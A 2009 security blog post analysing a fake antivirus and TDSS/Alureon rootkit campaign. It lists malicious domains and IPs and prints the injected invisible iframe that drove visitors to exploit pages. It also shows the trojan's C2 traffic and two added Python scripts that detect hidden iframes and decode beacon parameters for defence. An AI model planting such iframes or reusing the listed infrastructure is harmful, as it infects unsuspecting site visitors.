Monday, April 20, 2009

Black Hat SEO and Rogue Antivirus p.8

The silent threat: Black Hat SEO and Rogue Antivirus

Fake Antivirus + Rootkit TDSS / Alureon / DNSChanger Trojan

READ THIS page if you need more information

A quick look at the IP block 209.44.126.0/24, run by "Netelligent Hosting Services Inc", which hosts several fake AV websites as well as exploit pages spreading the trojan TDSS/Alureon.

All of these have been reached through iframes injected into legitimate websites, poisoned keywords in Google search results and links on ad networks (screenshot below).


Check it out - maybe someone have access to your PC right now! Protect yourself.

Google also shows 14,800 results for this phrase.



Detection:

Trojan TDSS
Trojan DNSChanger
Trojan Kryptik
Trojan FakeSpyGuard
Trojan InternetAntivirusPro

Sites serving the fake antivirus campaign:

209.44.126.14

activesecurityshield.com
anytoplikedsite.com
basevirusscan.com
bestfiresfull.com
bestsecurityupdate.com
checkonlinesecurity.com
cleanyourpcspace.com
destroyvirusnow.com
fastsecurityscan.com
fastviruscleaner.com
firstscansecurity.com
fuc*moneycash.com
fullandtotalsecurity.com
fullsecurityshield.com
getpcguard.com
getscanonline.com
getsecuritywall.com
greatsecurityshield.com
inetsecuritycenter.com
initialsecurityscan.com
mostpopularscan.com
myfirstsecurityscan.com
mytoplikedsite.com
mytopvirusscan.com
onlinescandetect.com
onlinescanservice.com
popularpcscan.com
runpcscannow.com
scanalertspage.com
scanbaseonline.com
scanprotectiononline.com
scanvistanow.net
securityscan4you.com
securitytopagent.com
thegreatsecurity.com
todaybestscan.com
topsecurity4you.com
topsecurityapp.com
topsoftscanner.com
totalpcdefender.com
totalvirusdestroyer.com
truescansecurity.com
trustsecurityshield.com
upyoursecurity.com
virustopshield.com
vistastabilitynow.com
vistastabilitynow.net
websecuritymaster.com
websecurityvoice.com
yourstabilitysystem.com

209.44.126.16
systemsecurityonline.com
systemsecuritytool.com

209.44.126.29
individualpeople.biz (will be analyzed below)

209.44.126.14
209.44.126.15
209.44.126.16
209.44.126.17
209.44.126.22
209.44.126.23


Name server (NS) for the rogue fake AV websites:

209.44.126.32
asmmnation.com
ThreatExpert report
Used in conjunction with an IP in Ukraine: Symantec write-up



On the IP 209.44.126.29 we also have a couple of pages with exploits which lead to the trojan TDSS (Alureon).

I will take this domain as an example: individualpeople[.]biz

Malicious script (IFRAME) inserted into the compromised pages. Redirection Analysis

<iframe src="hxxp://individualpeople.biz/go.php?sid=1" width="0" height="0" frameborder="0"></iframe>

Redirects to the page below, which hosts several exploits. Javascript Analysis (Wepawet)

hxxp://individualpeople.biz/go.php?sid=6

Anubis Report

hxxp://209.44.126.30/unsecurity/pdf.php

Wepawet Analysis - VirusTotal

which finally loads this page:

hxxp://209.44.126.30/unsecurity/load.php

VirusTotal - Anubis

Detections:

W32/Alureon.B!Generic
Win32.Rootkit.TDSS.eyj.4
Packed.Win32.Tdss.f
Trojan.Win32.FakeSpyguard
Trojan:Win32/Alureon.gen!J
Trojan/Fakealert.gen
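The injected iframe above is the entry point of the whole chain, and it is easy to spot on a compromised page: a frame of zero width and height pointing off-site. The following is an added example (my code, not the blog's) that scans HTML for iframes of exactly that shape and, going one step beyond the post, also catches frames hidden with an inline style. The HTML it runs on is constructed and the hostile src is kept defanged (hxxp) as in the post.

```python
"""Flag zero-size / hidden <iframe> tags of the kind injected into
legitimate pages in this campaign (added example, not the blog's code)."""
import re
from html.parser import HTMLParser

# Constructed sample page: one normal iframe, one injected invisible iframe in
# the shape shown in the post (src defanged), and one hidden via CSS.
SAMPLE_HTML = """<html><body>
<h1>Welcome</h1>
<iframe src="http://example.com/video" width="640" height="480"></iframe>
<p>Some content</p>
<iframe src="hxxp://individualpeople.biz/go.php?sid=1" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://example.org/x" style="display:none;"></iframe>
</body></html>"""

# "0", "00", "0px" ... all count as zero.
_ZERO = re.compile(r"^\s*0+(px)?\s*$", re.I)
_HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


def _is_zero(value):
    return value is not None and bool(_ZERO.match(value))


class _IframeCollector(HTMLParser):
    """Collects every <iframe> start tag that looks intentionally invisible."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "iframe":
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        reasons = []
        if _is_zero(a.get("width")) and _is_zero(a.get("height")):
            reasons.append("zero-size")            # the pattern from the post
        if _HIDDEN_STYLE.search(a.get("style", "")):
            reasons.append("hidden-style")         # CSS-hidden variant
        if reasons:
            self.hits.append({"src": a.get("src", ""),
                              "reasons": reasons,
                              "line": self.getpos()[0]})


def find_hidden_iframes(html):
    """Return a list of suspicious iframes: src, why it was flagged, line no."""
    parser = _IframeCollector()
    parser.feed(html)
    parser.close()
    return parser.hits


if __name__ == "__main__":
    for hit in find_hidden_iframes(SAMPLE_HTML):
        print(f"line {hit['line']}: {hit['src']} ({', '.join(hit['reasons'])})")
```

Run against a crawled copy of a site, the output is a short list of frames worth a second look; a legitimate page rarely has a reason to embed a 0x0 frame from another host.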

--------------------------------------

HTTP activity after infection

92.48.91.145:80 - [trafficstatic.net]

Request: GET /banner/crcmds/main
Response: 200 "OK"
Request: GET /banner/crcmds/init
Response: 200 "OK"
Request: GET /banner/uacsrcr.dat
Response: 200 "OK"
Request: GET /banner/crcmds/update
Response: 200 "OK"
Request: GET /banner/crfiles/uacd
Response: 200 "OK"
Request: GET /banner/crfiles/uacc
Response: 200 "OK"
Request: GET /banner/crfiles/uaclog
Response: 200 "OK"
Request: GET /banner/crfiles/uacmask
Response: 200 "OK"
Request: GET /banner/crfiles/uacserf
Response: 200 "OK"
Request: GET /banner/crcmds/types/standart
Response: 404 "Not Found"
Request: GET /banner/crcmds/types/standart
Response: 404 "Not Found"
Request: GET /banner/crcmds/types/standart
Response: 404 "Not Found"
Request: GET /banner/crcmds/affids/11
Response: 404 "Not Found"
Request: GET /banner/crcmds/affids/11
Response: 404 "Not Found"
Request: GET /banner/crcmds/affids/11
Response: 404 "Not Found"
Request: GET /banner/crcmds/subids/v3072
Response: 404 "Not Found"
Request: GET /banner/crcmds/subids/v3072
Response: 404 "Not Found"
Request: GET /banner/crcmds/subids/v3072
Response: 404 "Not Found"
Request: GET /banner/crcmds/builds/bbr
Response: 200 "OK"
Request: GET /banner/crfiles/uacbbr
Response: 200 "OK"

72.233.114.126:80 - [statsanalist.cn]

Request: GET /?gd=KCo7MD8uPS4iPA==&affid=Xl4=&subid=GVxfWF0=&prov=Xw==&mode=cr&v=5
Response: 200 "OK"
Request: GET /?gd=ICQwJiE8Oy4jIw==&affid=Xl4=&subid=GVxfWF0=&prov=Xl9fXl8=&mode=cr&v=5
Response: 200 "OK"
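Two things in the traffic above are useful to a defender: the fixed /banner/crcmds/ and /banner/crfiles/ path layout, which is easy to match in proxy logs, and the statsanalist.cn query string, whose gd/affid/subid/prov values are base64 but not plain text. The following is an added example (my analysis code, not the blog's). It assumes the values are single-byte XOR under base64, which the post does not state; I derived the key from the subid value by lining it up with the "v3072" that appears in the /banner/crcmds/subids/v3072 request, and the same key turns affid into "11" (matching /affids/11) and the gd values into readable status words, so the assumption is consistent with everything on the page. The log lines are constructed from the requests listed above.

```python
"""Flag TDSS post-infection traffic in proxy logs and decode the obfuscated
statsanalist.cn beacon parameters (added example, not the blog's code)."""
import base64
from urllib.parse import urlparse

# Constructed proxy-log lines: client ip, host, method, url, status.
SAMPLE_LOG = """\
10.0.0.5 trafficstatic.net GET http://trafficstatic.net/banner/crcmds/main 200
10.0.0.5 trafficstatic.net GET http://trafficstatic.net/banner/crfiles/uacd 200
10.0.0.5 trafficstatic.net GET http://trafficstatic.net/banner/crcmds/subids/v3072 404
10.0.0.5 statsanalist.cn GET http://statsanalist.cn/?gd=KCo7MD8uPS4iPA==&affid=Xl4=&subid=GVxfWF0=&prov=Xw==&mode=cr&v=5 200
10.0.0.5 statsanalist.cn GET http://statsanalist.cn/?gd=ICQwJiE8Oy4jIw==&affid=Xl4=&subid=GVxfWF0=&prov=Xl9fXl8=&mode=cr&v=5 200
10.0.0.7 www.example.com GET http://www.example.com/banner/ad.png 200
"""

C2_PATH_PREFIXES = ("/banner/crcmds/", "/banner/crfiles/")
OBFUSCATED_PARAMS = ("gd", "affid", "subid", "prov")


def recover_xor_key(encoded, known_plaintext):
    """Recover a single-byte XOR key from one known plaintext.
    Returns None unless every byte agrees on the same key."""
    raw = base64.b64decode(encoded)
    if len(raw) != len(known_plaintext):
        return None
    keys = {c ^ ord(p) for c, p in zip(raw, known_plaintext)}
    return keys.pop() if len(keys) == 1 else None


def decode_param(encoded, key):
    """base64-decode, then XOR every byte with the single-byte key."""
    return bytes(c ^ key for c in base64.b64decode(encoded)).decode("ascii")


def _query_params(query):
    # Split by hand: parse_qs would turn a '+' inside base64 into a space.
    return dict(p.split("=", 1) for p in query.split("&") if "=" in p)


def analyse_log(text, key):
    """Return findings: C2 path hits and decoded beacons, in log order."""
    findings = []
    for line in text.splitlines():
        client, host, _method, url, _status = line.split()
        u = urlparse(url)
        if u.path.startswith(C2_PATH_PREFIXES):
            findings.append({"client": client, "host": host,
                             "kind": "tdss-c2-path", "path": u.path})
        qs = _query_params(u.query)
        if all(p in qs for p in OBFUSCATED_PARAMS):
            decoded = {p: decode_param(qs[p], key) for p in OBFUSCATED_PARAMS}
            findings.append({"client": client, "host": host,
                             "kind": "obfuscated-beacon", "decoded": decoded})
    return findings


if __name__ == "__main__":
    # subid must be the "v3072" seen in /banner/crcmds/subids/v3072 (assumption).
    key = recover_xor_key("GVxfWF0=", "v3072")
    print(f"recovered key: 0x{key:02x}")
    for f in analyse_log(SAMPLE_LOG, key):
        print(f)
```

With the recovered key the first beacon reads gd=GET_PARAMS, affid=11, subid=v3072, prov=0 and the second gd=OK_INSTALL with prov=10010, i.e. the infected host reporting back which affiliate and build it came from and that the install completed. A proxy rule on the two path prefixes, plus an alert on any request carrying all four parameter names, covers both halves of this traffic.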


IPs implicated:

209.44.126.14
209.44.126.15
209.44.126.16
209.44.126.17
209.44.126.22
209.44.126.23
209.44.126.29
209.44.126.32

Other related domains can be found using ThreatExpert, searching for the path

/banner/crcmds/main

Report 1
Report 2

92.48.91.144
trafficstatic.com
explorerex.com
windowslogonex.com

92.48.91.145
trafficstatic.net
ThreatExpert Report

95.211.14.159
golddiggero1.com

76.76.103.162
webieupdate.net

94.76.208.32
symupdate2.com
ThreatExpert Report

72.233.114.125
webnicrisoft.net
ThreatExpert Report

64.213.140.254
webmsupdate.net
ThreatExpert Report